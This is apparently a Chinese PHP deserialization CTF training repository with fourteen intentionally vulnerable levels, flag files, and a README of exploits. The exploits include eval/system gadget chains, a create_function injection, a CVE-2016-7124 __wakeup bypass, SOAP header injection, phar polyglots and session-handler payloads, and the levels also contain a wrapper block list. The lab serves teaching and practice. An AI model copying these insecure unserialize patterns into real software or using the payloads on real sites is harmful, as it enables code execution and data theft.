├── README.md
├── level1
    ├── flag.php
    └── index.php
├── level10
    ├── flag.php
    └── index.php
├── level11
    ├── flag.php
    ├── index.php
    └── upload.php
├── level12
    ├── flag.php
    ├── index.php
    ├── upload.php
    └── upload
    │   └── phar1.png
├── level13
    ├── flag.php
    ├── hint.php
    └── index.php
├── level14
    ├── flag.php
    └── index.php
├── level2
    ├── flag.php
    └── index.php
├── level3
    ├── flag.php
    └── index.php
├── level4
    ├── flag.php
    └── index.php
├── level5
    ├── flag.php
    └── index.php
├── level6
    ├── flag.php
    └── index.php
├── level7
    ├── flag.php
    └── index.php
├── level8
    ├── flag.php
    └── index.php
├── level9
    ├── flag.php
    └── index.php
└── pic
    ├── image-20220131204258921.png
    ├── image-20220205105027434.png
    ├── image-20220208202613945.png
    ├── image-20220212192425222.png
    ├── image-20220212192433656.png
    ├── image-20220212192454775.png
    ├── image-20220217103937584.png
    ├── image-20220221092905715.png
    ├── image-20220221100925190.png
    └── image-20220311065409439.png


/README.md:
--------------------------------------------------------------------------------
  1 | # 一，说明
  2 | 
  3 | 在学习反序列漏洞的道路中，最首要的就是掌握类和对象的基础知识，懂得php的基本语法。本项目关卡由易至难，建议广大萌新们全部掌握。小白技术一般，还请广大黑客朋友们见谅~~~
  4 | 
  5 | 本着分享学习的目的，本人仅提供exp，并不提供完整的wp，绝对不是太懒的原因~~~
  6 | 
  7 | 以下内容 或来自提取的CTF考点，或来自个人的理解与整合，均不涉及原题。如有错误，还请见谅~~
  8 | 
  9 | # 二，环境
 10 | 
 11 | ## 1说明
 12 | 
 13 | 通过PHPstudy，搭建简易wamp环境。
 14 | 
 15 | ## 2要求
 16 | 
 17 | 请根据表格内容自行更换及安装php版本和扩展（若无要求，自行斟酌）。
 18 | 
 19 | 不会吧，不会吧，不会真有人配了个php<=5.0版本的然后说环境搭不起来吧。
 20 | 
 21 | | 关卡                                   | 不适用其他版本的原因以及相关设置                             |
 22 | | :------------------------------------- | :----------------------------------------------------------- |
 23 | | level4 create_fucntion与可变函数调用   | 5.6不支持可变函数，7.2已废除create_function                  |
 24 | | level5 序列化格式过滤与CVE-2016-7124   | CVE-2016-7124漏洞影响版本：PHP5 < 5.6.25，PHP7 < 7.0.10      |
 25 | | level6 私有属性反序列化                | escaped binary string(仅从php6开始支持)                      |
 26 | | level7 __call与属性的初始值            | 同上                                                         |
 27 | | level10 just_one_soap                  | 需要开启soap扩展(php5.6：extension=php_soap)                 |
 28 | | level11 a phar 和 level12 a phar trick | php.ini中phar.readonly=Off（若有分号则去掉）                 |
 29 | | level13 引用和session                  | session.auto_start=0;<br/>session.serialize_handler = php;（level13均为默认设置） |
 30 | | leve14 session.upload_progress         | session.auto_start=0;<br/>session.serialize_handler = php_serialize;<br>session.upload_progress.enabled = On;<br>session.upload_progress.cleanup = Off;<br>session.upload_progress.prefix = "upload_progress_";<br>session.upload_progress.name = "PHP_SESSION_UPLOAD_PROGRESS";<br>session.upload_progress.freq =  "1%";<br>session.upload_progress.min_freq = "1"; |
 31 | 
 32 | 
 33 | 
 34 | 
 35 | 
 36 | # 三，wp
 37 | 
 38 | **level1 类的实例化**
 39 | 
 40 | ```php
 41 | <?php
 42 | class a{
 43 |     var $act;
 44 |     function action(){
 45 |         eval($this->act);
 46 |     }
 47 | }
 48 | $a=new a();
 49 | $a->act="show_source('flag.php');";
 50 | $a->action();
 51 | echo serialize($a);
 52 | ?>
 53 | ```
 54 | 
 55 | 
 56 | 
 57 | **level2 login**
 58 | 
 59 | ```php
 60 | <?php
 61 | highlight_file(__FILE__);
 62 | class mylogin{
 63 |     var $user;
 64 |     var $pass;
 65 |     function __construct($user,$pass){
 66 |         $this->user=$user;
 67 |         $this->pass=$pass;
 68 |     }
 69 |     function login(){
 70 |         if ($this->user=="daydream" and $this->pass=="ok"){
 71 |             return 1;
 72 |         }
 73 |     }
 74 | }
 75 | $a=new mylogin('daydream','ok');
 76 | if($a->login())
 77 | {
 78 |     echo 'flag'."\n";
 79 | }
 80 | echo serialize($a);
 81 | ?>
 82 | ```
 83 | 
 84 | 
 85 | 
 86 | **level3 relogin**
 87 | 
 88 | ```php
 89 | echo urlencode(serialize($a));
 90 | ```
 91 | 
 92 | url编码后，抓包修改发送即可。以下截图为重放攻击。
 93 | 
 94 | ![image-20220205105027434](/pic/image-20220205105027434.png)
 95 | 
 96 | 
 97 | 
 98 | **level4 create_fucntion与可变函数调用**
 99 | 
100 | 注意：两个类实例化调用属性的顺序。
101 | 
102 | ```php
103 | <?php
104 | highlight_file(__FILE__);
105 | class func
106 | {
107 |     public $key;
108 |     public function __destruct()
109 |     {
110 |         unserialize($this->key)();
111 |     }
112 | }
113 | 
114 | class GetFlag
115 | {
116 |     public $code;
117 |     public $action;
118 |     public function get_flag(){
119 |         $a=$this->action;
120 |         $a('', $this->code);
121 |     }
122 | }
123 | $a1=new func();
124 | $b=new GetFlag();
125 | $b->code='}include("flag.php");echo $flag;//';
126 | $b->action="create_function";
127 | $a1->key=serialize(array($b,"get_flag"));
128 | echo serialize($a1);
129 | ?>
130 | ```
131 | 
132 | **level5 序列化格式过滤与CVE-2016-7124**
133 | 
134 | ```php
135 | <?php
136 | class secret{
137 |     var $file='index.php';
138 | 
139 |     public function __construct($file){
140 |         $this->file=$file;
141 |         echo $flag;
142 |     }
143 | 
144 |     function __destruct(){
145 |         include_once($this->file);
146 |     }
147 | 
148 |     function __wakeup(){
149 |         $this->file='index.php';
150 |     }
151 | }
152 | $pa=new secret('flag.php');
153 | echo serialize($pa),"\n";//O:6:"secret":1:{s:4:"file";s:8:"flag.php";}
154 | $cmd=urlencode('O:+6:"secret":2:{s:4:"file";s:8:"flag.php";}');
155 | echo $cmd;
156 | ?>
157 | ```
158 | 
159 | **level6 私有属性反序列化**
160 | 
161 | ```php
162 | <?php
163 | class secret{
164 |     private $comm;
165 |     public function __construct($com){
166 |         $this->comm = $com;
167 |     }
168 |     function __destruct(){
169 |         echo eval($this->comm);
170 |     }
171 | }
172 | $pa=new secret("system('type flag.php');");
173 | echo serialize($pa),"\n";
174 | //O:6:"secret":1:{s:12:" secret comm";s:24:"system('type flag.php');";}
175 | //O:6:"secret":1:{S:12:"\00secret\00comm";s:24:"system('type flag.php');";}
176 | ?>
177 | ```
178 | 
179 | ![image-20220208202613945](/pic/image-20220208202613945.png)
180 | 
181 | **level7 __call与属性的初始值**
182 | 
183 | ```php
184 | <?php
185 | class you
186 | {
187 |     private $body;
188 |     private $pro;
189 |     function __construct(){
190 |         $this->body=new my();
191 |         $this->pro='yourname';
192 |     }
193 |     function __destruct()
194 |     {
195 |         $project=$this->pro;
196 |         $this->body->$project();
197 |     }
198 | }
199 | 
200 | class my
201 | {
202 |     public $name='myname';
203 | 
204 |     function __call($func, $args)
205 |     {
206 |         if ($func == 'yourname' and $this->name == 'myname') {
207 |             include('flag.php');
208 |             echo $flag;
209 |         }
210 |     }
211 | }
212 | $p=new you();
213 | echo serialize($p);
214 | //大写S
215 | //O:3:"you":2:{S:9:"\00you\00body";O:2:"my":1:{s:4:"name";s:6:"myname";}S:8:"\00you\00pro";s:8:"yourname";}
216 | ?>
217 | ```
218 | 
219 | **level8 反序列化增逃逸**
220 | 
221 | ```php
222 | <?php
223 | highlight_file(__FILE__);
224 | function filter($name){
225 |     $safe=array("flag","php");
226 |     $name=str_replace($safe,"hack",$name);
227 |     return $name;
228 | }
229 | class test{
230 |     var $user;
231 |     var $pass='daydream';
232 |     function __construct($user){
233 |         $this->user=$user;
234 |     }
235 | }
236 | $a=new test('phpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphp";s:4:"pass";s:8:"escaping";}');
237 | //$a=new test('1');  O:4:"test":2:{s:4:"user";s:1:"1";s:4:"pass";s:8:"daydream";}
238 | //逃逸内容：
239 | //";s:4:"pass";s:8:"escaping";}
240 | //计算需要链：
241 | //phpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphp";s:4:"pass";s:8:"escaping";}
242 | $param=serialize($a);
243 | echo $param,"\n";
244 | 
245 | $profile=unserialize(filter($param));
246 | echo $profile->pass,"\n";
247 | if ($profile->pass=='escaping'){
248 |     echo 1;
249 | }
250 | ?>
251 | ```
252 | 
253 | ```
254 | O:4:"test":2:{s:4:"user";s:116:"phpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphp";s:4:"pass";s:8:"escaping";}";s:4:"pass";s:8:"daydream";}
255 | ```
256 | 
257 | ![image-20220212192454775](/pic/image-20220212192454775.png)
258 | 
259 | **leve9 ezpop**
260 | 
261 | ```php
262 | <?php
263 | 
264 | class Modifier {
265 |     private $var="flag.php";
266 |     public function append($value)
267 |     {
268 |         include($value);
269 |         echo $flag;
270 |     }
271 |     public function __invoke(){
272 |         $this->append($this->var);
273 |     }
274 | }
275 | 
276 | class Show{
277 |     public $source;
278 |     public $str;
279 |     public function __toString(){
280 |         return $this->str->source;
281 |     }
282 |     public function __wakeup(){
283 |         echo $this->source;
284 |     }
285 | }
286 | 
287 | class Test{
288 |     public $p;
289 |     public function __construct(){
290 |         $this->p = array();
291 |     }
292 | 
293 |     public function __get($key){
294 |         $function = $this->p;
295 |         return $function();
296 |     }
297 | }
298 | 
299 | $a=new Modifier();
300 | $b=new Show();
301 | $c=new Test();
302 | 
303 | $b->source=$b;
304 | $b->source->str=$c;
305 | $c->p=$a;
306 | echo "\n";
307 | echo urlencode(serialize($b));
308 | ```
309 | 
310 | **level10 just_one_soap**
311 | 
312 | soap数据包测试方法：将loaction更改为监听ip和端口即可（注意：该包是index.php”发出“的）。
313 | 
314 | 下图实例（公网ip测试）：![image-20220217103937584](/pic/image-20220217103937584.png)
315 | 
316 | ```php
317 | <?php
318 | $post_data='pass=password';
319 | $data_len=strlen($post_data);
320 | $a = new SoapClient(null,array('location'=>'http://shiyan/SER/level10/flag.php','user_agent'=>'admin^^Content-Type: application/x-www-form-urlencoded^^Content-Length: '.$data_len.'^^^^'.$post_data,'uri'=>'bbba'));
321 | $b = serialize($a);
322 | $b = str_replace('^^',"\r\n",$b);
323 | $b = str_replace('&','&',$b);
324 | echo urlencode($b);
325 | ```
326 | 
327 | **level11 a phar**
328 | 
329 | ```php
330 | <?php
331 | class TestObject {
332 | }
333 | 
334 | @unlink("phar1.phar");
335 | $phar = new Phar("phar1.phar");
336 | $phar->startBuffering();
337 | $phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>");
338 | $o = new TestObject();
339 | $phar->setMetadata($o);
340 | $phar->addFromString("test.txt", "test"); 
341 | $phar->stopBuffering();
342 | ?>
343 | ```
344 | 
345 | ![image-20220221092905715](/pic/image-20220221092905715.png)
346 | 
347 | **level12 a phar trick** 
348 | 
349 | ![image-20220221100925190](/pic/image-20220221100925190.png)
350 | 
351 | **level13 引用和session** 
352 | 
353 | ```php
354 | <?php
355 | 
356 | class Flag{
357 |     public $name;
358 |     public $her;
359 |     function __wakeup(){
360 |         $this->name=$this->her=md5(rand(1, 10000));
361 |         if ($this->name===$this->her){
362 |             include('flag.php');
363 |             echo $flag;
364 |         }
365 |     }
366 | }
367 | $b=new Flag();
368 | $b->her=&$b->name;
369 | echo serialize($b);
370 | 
371 | ?>
372 | ```
373 | 
374 | 
375 | 
376 | `url/hint.php?a=|O:4:%22Flag%22:2:{s:4:%22name%22;N;s:3:%22her%22;R:2;}`
377 | 
378 | 再访问index.php
379 | 
380 | **leve14 session.upload_progress**
381 | 
382 | 特此注明：有关这道题其实还可以设置session.upload_cleanup = Off，然后考条件竞争，但是此方式与upload类相关漏洞过于相似，此项目就不设置其作为关卡了，感兴趣的朋友可以自行设置游玩。
383 | 
384 | exp
385 | 
386 | ```php
387 | <?php
388 | class test{
389 |     public $name;
390 |     function __destruct(){
391 |         if($this->name=='flag'){
392 |             include('flag.php');
393 |             echo $flag;
394 |         }
395 |         else{
396 |             phpinfo();
397 |         }
398 |     }
399 | }
400 | $a=new test();
401 | $a->name='flag';
402 | echo serialize($a);
403 | ```
404 | 
405 | `|O:4:\"test\":1:{s:4:\"name\";s:4:\"flag\";}`
406 | 
407 | test.html
408 | 
409 | <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
410 | <form id="upload-form" action="http://************/level14/index.php" method="POST" enctype="multipart/form-data">
411 |         <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="test"/>
412 |         上传文件…
413 |         <input name="file1" type="file" />
414 |         <input type="submit" value="上传"/>
415 |     </form>
416 | 
417 | 
418 | 通过test.html“上传”任意文件，然后抓包，利用payload改包，最后发包，OK
419 | 
420 | ![image-20220311065409439](/pic/image-20220311065409439.png)
421 | 


--------------------------------------------------------------------------------
/level1/flag.php:
--------------------------------------------------------------------------------
1 | <?php
2 | $flag="flag{level1_is_over_come_0n}";
3 | ?>


--------------------------------------------------------------------------------
/level1/index.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | highlight_file(__FILE__);
 3 | class a{
 4 | 	var $act;
 5 | 	function action(){
 6 | 		eval($this->act);
 7 | 	}
 8 | }
 9 | $a=unserialize($_GET['flag']);
10 | $a->action();
11 | ?>
12 | <br><a href="../level2">点击进入第二关</a>


--------------------------------------------------------------------------------
/level10/flag.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | $flag='flag{well_d0ne_you_did_A_good_level10}';
 3 | $user=$_SERVER['HTTP_USER_AGENT'];
 4 | $pass = $_POST['pass'];
 5 | if(isset($pass) and isset($user)){
 6 | 	if($pass=='password' and $user=='admin'){
 7 | 		file_put_contents('flag.txt',$flag);
 8 | 	}	
 9 | }
10 | ?>
11 | ?>


--------------------------------------------------------------------------------
/level10/index.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | highlight_file(__FILE__);
 3 | 
 4 | $c = unserialize($_GET['param']);
 5 | $c -> daydream();
 6 | 
 7 | /*
 8 | In this topic,it is of course possible to pass parameters directly to flag.php, but it is not recommended to use this method to learn SOAP.
 9 | flag.php
10 | $flag="*";
11 | $user=$_SERVER['HTTP_USER_AGENT'];
12 | $pass = $_POST['pass'];
13 | if(isset($pass) and isset($user)){
14 | 	if($pass=='password' and $user=='admin'){
15 | 		file_put_contents('flag.txt',$flag);
16 | 	}	
17 | }
18 | */
19 | ?>
20 | <br><a href="../level1">点击进入第十一关</a>


--------------------------------------------------------------------------------
/level11/flag.php:
--------------------------------------------------------------------------------
1 | <?php
2 | $flag="flag{Can_level11_s_Phar_be_s0_easy?}";
3 | ?>


--------------------------------------------------------------------------------
/level11/index.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | highlight_file(__FILE__);
 3 | class TestObject {
 4 |     public function __destruct() {
 5 | 		include('flag.php');
 6 |         echo $flag;
 7 |     }
 8 | }
 9 | $filename = $_POST['file'];
10 | if (isset($filename)){
11 | 	echo md5_file($filename);
12 | }
13 | //upload.php
14 | ?>
15 | <br><a href="../level12">点击进入第十二关</a>


--------------------------------------------------------------------------------
/level11/upload.php:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <head>
 3 |     <meta charset="UTF-8"> 
 4 |     <title>上传图片文件</title>
 5 | </head>
 6 | <body>
 7 | <form action="" method="post" enctype="multipart/form-data">
 8 |     <label for="file">文件名：</label>
 9 |         <input type="file" name="file" id="file">
10 |         <input type="submit" name="submit" id="上传">
11 | </form>
12 | </body>
13 | </html>
14 | <?php
15 | $allowedExs=array("gif","jpeg","jpg","png");
16 | $temp=explode(".",$_FILES["file"]["name"]);
17 | $extension=end($temp);
18 | if (($_FILES["file"]["type"])=="image/gif"
19 |     ||($_FILES["file"]["type"])=="image/jpeg"
20 |     ||($_FILES["file"]["type"])=="image/jpg"
21 |     ||($_FILES["file"]["type"])=="image/pjpeg"
22 |     ||($_FILES["file"]["type"])=="image/x-png"
23 |     ||($_FILES["file"]["type"])=="image/png"
24 |     &&($_FILES["file"]["size"])<204800
25 |     &&in_array($extension,$allowedExs)){
26 |     if($_FILES["file"]["error"]>0){
27 |         echo "错误：".$_FILES["file"]["error"]."<br/>";
28 |     }
29 |     else{
30 |         move_uploaded_file($_FILES["file"]["tmp_name"],"upload/".$_FILES["file"]["name"]);
31 |         echo "文件储存在"."upload/".$_FILES["file"]["name"];
32 |         }
33 |     }
34 | else{
35 |     echo "mybe hack?";
36 | }
37 |   


--------------------------------------------------------------------------------
/level12/flag.php:
--------------------------------------------------------------------------------
1 | <?php
2 | $flag="flag{OPs_level12_ls_a_Phar_TrIk}";
3 | ?>


--------------------------------------------------------------------------------
/level12/index.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | highlight_file(__FILE__);
 3 | class TestObject {
 4 |     public function __destruct() {
 5 | 		include('flag.php');
 6 |         echo $flag;
 7 |     }
 8 | }
 9 | $filename = $_POST['file'];
10 | $boo1=1;
11 | $black_list=['php','file','glob','data','http','ftp','zip','https','ftps','phar'];
12 | foreach($black_list as $item){
13 | 	$front=substr($filename,0,strlen($item));
14 | 	if ($front==$item){
15 | 		$boo1=0;
16 | 	}
17 | }
18 | if (isset($filename) and $boo1){
19 | 	echo md5_file($filename);
20 | }
21 | //upload.php
22 | ?>
23 | <br><a href="../level13">点击进入第十三关</a>


--------------------------------------------------------------------------------
/level12/upload.php:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <head>
 3 |     <meta charset="UTF-8"> 
 4 |     <title>上传图片文件</title>
 5 | </head>
 6 | <body>
 7 | <form action="" method="post" enctype="multipart/form-data">
 8 |     <label for="file">文件名：</label>
 9 |         <input type="file" name="file" id="file">
10 |         <input type="submit" name="submit" id="上传">
11 | </form>
12 | </body>
13 | </html>
14 | <?php
15 | $allowedExs=array("gif","jpeg","jpg","png");
16 | $temp=explode(".",$_FILES["file"]["name"]);
17 | $extension=end($temp);
18 | if (($_FILES["file"]["type"])=="image/gif"
19 |     ||($_FILES["file"]["type"])=="image/jpeg"
20 |     ||($_FILES["file"]["type"])=="image/jpg"
21 |     ||($_FILES["file"]["type"])=="image/pjpeg"
22 |     ||($_FILES["file"]["type"])=="image/x-png"
23 |     ||($_FILES["file"]["type"])=="image/png"
24 |     &&($_FILES["file"]["size"])<204800
25 |     &&in_array($extension,$allowedExs)){
26 |     if($_FILES["file"]["error"]>0){
27 |         echo "错误：".$_FILES["file"]["error"]."<br/>";
28 |     }
29 |     else{
30 |         move_uploaded_file($_FILES["file"]["tmp_name"],"upload/".$_FILES["file"]["name"]);
31 |         echo "文件储存在"."upload/".$_FILES["file"]["name"];
32 |         }
33 |     }
34 | else{
35 |     echo "mybe hack?";
36 | }
37 |   


--------------------------------------------------------------------------------
/level12/upload/phar1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fine-1/php-SER-libs/81c4bdf359c062ab681ced8fa16c90583b216d64/level12/upload/phar1.png


--------------------------------------------------------------------------------
/level13/flag.php:
--------------------------------------------------------------------------------
1 | <?php
2 | $flag="flag{leeeeeeeeevel13_iiiiiis_ooooook!}";
3 | ?>


--------------------------------------------------------------------------------
/level13/hint.php:
--------------------------------------------------------------------------------
1 | <?php
2 | highlight_file(__FILE__);
3 | ini_set('session.serialize_handler', 'php_serialize');
4 | session_start();
5 | $_SESSION['a'] = $_GET['a'];
6 | ?>


--------------------------------------------------------------------------------
/level13/index.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | highlight_file(__FILE__);
 3 | /*hint.php*/
 4 | session_start();
 5 | class Flag{
 6 |     public $name;
 7 |     public $her;
 8 |     function __wakeup(){
 9 |         $this->name=$this->her=md5(rand(1, 10000));
10 |         if ($this->name===$this->her){
11 |             include('flag.php');
12 |             echo $flag;
13 |         }
14 |     }
15 | }
16 | ?>
17 | <br><a href="../level14">点击进入第十四关</a>


--------------------------------------------------------------------------------
/level14/flag.php:
--------------------------------------------------------------------------------
1 | <?php
2 | $flag='flag{Emmm,level14_is_just_lIke_level1_xixi}';
3 | ?>


--------------------------------------------------------------------------------
/level14/index.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | highlight_file(__FILE__);
 3 | ini_set('session.serialize_handler', 'php');
 4 | session_start();
 5 | 
 6 | class test{
 7 |     public $name;
 8 |     function __destruct(){
 9 |         if($this->name=='flag'){
10 |             include('flag.php');
11 |             echo $flag;
12 |         }
13 |         else{
14 |             phpinfo();
15 |         }
16 |     }
17 | }


--------------------------------------------------------------------------------
/level2/flag.php:
--------------------------------------------------------------------------------
1 | <?php
2 | $flag="flag{level2_is_0k_here_you_g0}";
3 | ?>


--------------------------------------------------------------------------------
/level2/index.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | highlight_file(__FILE__);
 3 | include("flag.php");
 4 | class mylogin{
 5 |     var $user;
 6 | 	var $pass;
 7 | 	function __construct($user,$pass){
 8 | 		$this->user=$user;
 9 | 		$this->pass=$pass;
10 | 	}
11 |     function login(){
12 | 		if ($this->user=="daydream" and $this->pass=="ok"){
13 | 			return 1;
14 | 		}
15 |     }
16 | }
17 | $a=unserialize($_GET['param']);
18 | if($a->login())
19 | {
20 | 	echo $flag;
21 | }
22 | ?> 
23 | <br><a href="../level3">点击进入第三关</a>


--------------------------------------------------------------------------------
/level3/flag.php:
--------------------------------------------------------------------------------
1 | <?php
2 | $flag="flag{level3_is_s0_easy_right?}";
3 | ?>


--------------------------------------------------------------------------------
/level3/index.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | highlight_file(__FILE__);
 3 | include("flag.php");
 4 | class mylogin{
 5 |     var $user;
 6 | 	var $pass;
 7 | 	function __construct($user,$pass){
 8 | 		$this->user=$user;
 9 | 		$this->pass=$pass;
10 | 	}
11 |     function login(){
12 | 		if ($this->user=="daydream" and $this->pass=="ok"){
13 | 			return 1;
14 | 		}
15 |     }
16 | }
17 | $a=unserialize($_COOKIE['param']);
18 | if($a->login())
19 | {
20 | 	echo $flag;
21 | }
22 | ?> 
23 | <br><a href="../level4">点击进入第四关</a>


--------------------------------------------------------------------------------
/level4/flag.php:
--------------------------------------------------------------------------------
1 | <?php
2 | $flag="flag{NI_T_level4_easy_ge_pi}";
3 | ?>


--------------------------------------------------------------------------------
/level4/index.php:
--------------------------------------------------------------------------------
 1 | <?php 
 2 | highlight_file(__FILE__);
 3 | class func
 4 | {
 5 |         public $key;
 6 |         public function __destruct()
 7 |         {        
 8 |                 unserialize($this->key)();
 9 |         } 
10 | }
11 | 
12 | class GetFlag
13 | {       public $code;
14 |         public $action;
15 |         public function get_flag(){
16 |             $a=$this->action;
17 |             $a('', $this->code);
18 |         }
19 | }
20 | 
21 | unserialize($_GET['param']);
22 | 
23 | ?>
24 | <br><a href="../level5">点击进入第五关</a>


--------------------------------------------------------------------------------
/level5/flag.php:
--------------------------------------------------------------------------------
1 | <?php
2 | $flag="flag{welcome_T0_level5_we_are_al1_in_r0ad}";
3 | ?>


--------------------------------------------------------------------------------
/level5/index.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 |     class secret{
 3 |         var $file='index.php';
 4 | 
 5 |         public function __construct($file){
 6 |             $this->file=$file;
 7 |         }
 8 | 
 9 |         function __destruct(){
10 |             include_once($this->file);
11 | 			echo $flag;
12 |         }
13 | 
14 |         function __wakeup(){
15 |             $this->file='index.php';
16 |         }
17 |     }
18 | 	$cmd=$_GET['cmd'];
19 |     if (!isset($cmd)){
20 |         echo show_source('index.php',true);
21 |     }
22 |     else{
23 |         if (preg_match('/[oc]:\d+:/i',$cmd)){
24 |             echo "Are you daydreaming?";
25 |         }
26 |         else{
27 |             unserialize($cmd);
28 |         }
29 |     }
30 | 	//sercet in flag.php
31 | ?>
32 | 
33 | <br><a href="../level6">点击进入第六关</a>


--------------------------------------------------------------------------------
/level6/flag.php:
--------------------------------------------------------------------------------
1 | <?php
2 | $flag="flag{level6_Is_yue_lai_yue_fu_yan}";
3 | ?>


--------------------------------------------------------------------------------
/level6/index.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | highlight_file(__FILE__);
 3 | class secret{
 4 |     private $comm;
 5 |     public function __construct($com){
 6 |         $this->comm = $com;
 7 |     }
 8 |     function __destruct(){
 9 |         echo eval($this->comm);
10 |     }
11 | }
12 | $param=$_GET['param'];
13 | $param=str_replace("%","daydream",$param);
14 | unserialize($param);
15 | ?>
16 | <br><a href="../level7">点击进入第七关</a>


--------------------------------------------------------------------------------
/level7/flag.php:
--------------------------------------------------------------------------------
1 | <?php
2 | $flag="flag{level7_running_with_progress}";
3 | ?>


--------------------------------------------------------------------------------
/level7/index.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | highlight_file(__FILE__);
 3 | class you
 4 | {
 5 |     private $body;
 6 |     private $pro='';
 7 |     function __destruct()
 8 |     {
 9 |         $project=$this->pro;
10 |         $this->body->$project();
11 |     }
12 | }
13 | 
14 | class my
15 | {
16 |     public $name;
17 | 
18 |     function __call($func, $args)
19 |     {
20 |         if ($func == 'yourname' and $this->name == 'myname') {
21 |             include('flag.php');
22 |             echo $flag;
23 |         }
24 |     }
25 | }
26 | $a=$_GET['a'];
27 | unserialize($a);
28 | ?>
29 | <br><a href="../level8">点击进入第八关</a>


--------------------------------------------------------------------------------
/level8/flag.php:
--------------------------------------------------------------------------------
1 | <?php
2 | $flag="flag{level8_g0_fun_popp1ng}";
3 | ?>


--------------------------------------------------------------------------------
/level8/index.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | highlight_file(__FILE__);
 3 | function filter($name){
 4 |     $safe=array("flag","php");
 5 |     $name=str_replace($safe,"hack",$name);
 6 |     return $name;
 7 | }
 8 | class test{
 9 |     var $user;
10 |     var $pass='daydream';
11 |     function __construct($user){
12 |         $this->user=$user;
13 |     }
14 | }
15 | 
16 | $param=$_GET['param'];
17 | $profile=unserialize(filter($param));
18 | if ($profile->pass=='escaping'){
19 |     echo file_get_contents("flag.php");
20 | }
21 | ?>
22 | <br><a href="../level9">点击进入第九关</a>


--------------------------------------------------------------------------------
/level9/flag.php:
--------------------------------------------------------------------------------
1 | <?php
2 | $flag="flag{welcom_t0_SOAP_In_level9}";
3 | ?>


--------------------------------------------------------------------------------
/level9/index.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | //flag is in flag.php
 3 | highlight_file(__FILE__);
 4 | class Modifier {
 5 |     private $var;
 6 |     public function append($value)
 7 |     {
 8 |         include($value);
 9 |         echo $flag;
10 |     }
11 |     public function __invoke(){
12 |         $this->append($this->var);
13 |     }
14 | }
15 | 
16 | class Show{
17 |     public $source;
18 |     public $str;
19 |     public function __toString(){
20 |         return $this->str->source;
21 |     }
22 |     public function __wakeup(){
23 |         echo $this->source;
24 |     }
25 | }
26 | 
27 | class Test{
28 |     public $p;
29 |     public function __construct(){
30 |         $this->p = array();
31 |     }
32 | 
33 |     public function __get($key){
34 |         $function = $this->p;
35 |         return $function();
36 |     }
37 | }
38 | 
39 | if(isset($_GET['pop'])){
40 |     unserialize($_GET['pop']);
41 | }
42 | ?>
43 | <br><a href="../level10">点击进入第十关</a>


--------------------------------------------------------------------------------
/pic/image-20220131204258921.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fine-1/php-SER-libs/81c4bdf359c062ab681ced8fa16c90583b216d64/pic/image-20220131204258921.png


--------------------------------------------------------------------------------
/pic/image-20220205105027434.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fine-1/php-SER-libs/81c4bdf359c062ab681ced8fa16c90583b216d64/pic/image-20220205105027434.png


--------------------------------------------------------------------------------
/pic/image-20220208202613945.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fine-1/php-SER-libs/81c4bdf359c062ab681ced8fa16c90583b216d64/pic/image-20220208202613945.png


--------------------------------------------------------------------------------
/pic/image-20220212192425222.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fine-1/php-SER-libs/81c4bdf359c062ab681ced8fa16c90583b216d64/pic/image-20220212192425222.png


--------------------------------------------------------------------------------
/pic/image-20220212192433656.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fine-1/php-SER-libs/81c4bdf359c062ab681ced8fa16c90583b216d64/pic/image-20220212192433656.png


--------------------------------------------------------------------------------
/pic/image-20220212192454775.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fine-1/php-SER-libs/81c4bdf359c062ab681ced8fa16c90583b216d64/pic/image-20220212192454775.png


--------------------------------------------------------------------------------
/pic/image-20220217103937584.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fine-1/php-SER-libs/81c4bdf359c062ab681ced8fa16c90583b216d64/pic/image-20220217103937584.png


--------------------------------------------------------------------------------
/pic/image-20220221092905715.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fine-1/php-SER-libs/81c4bdf359c062ab681ced8fa16c90583b216d64/pic/image-20220221092905715.png


--------------------------------------------------------------------------------
/pic/image-20220221100925190.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fine-1/php-SER-libs/81c4bdf359c062ab681ced8fa16c90583b216d64/pic/image-20220221100925190.png


--------------------------------------------------------------------------------
/pic/image-20220311065409439.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fine-1/php-SER-libs/81c4bdf359c062ab681ced8fa16c90583b216d64/pic/image-20220311065409439.png


--------------------------------------------------------------------------------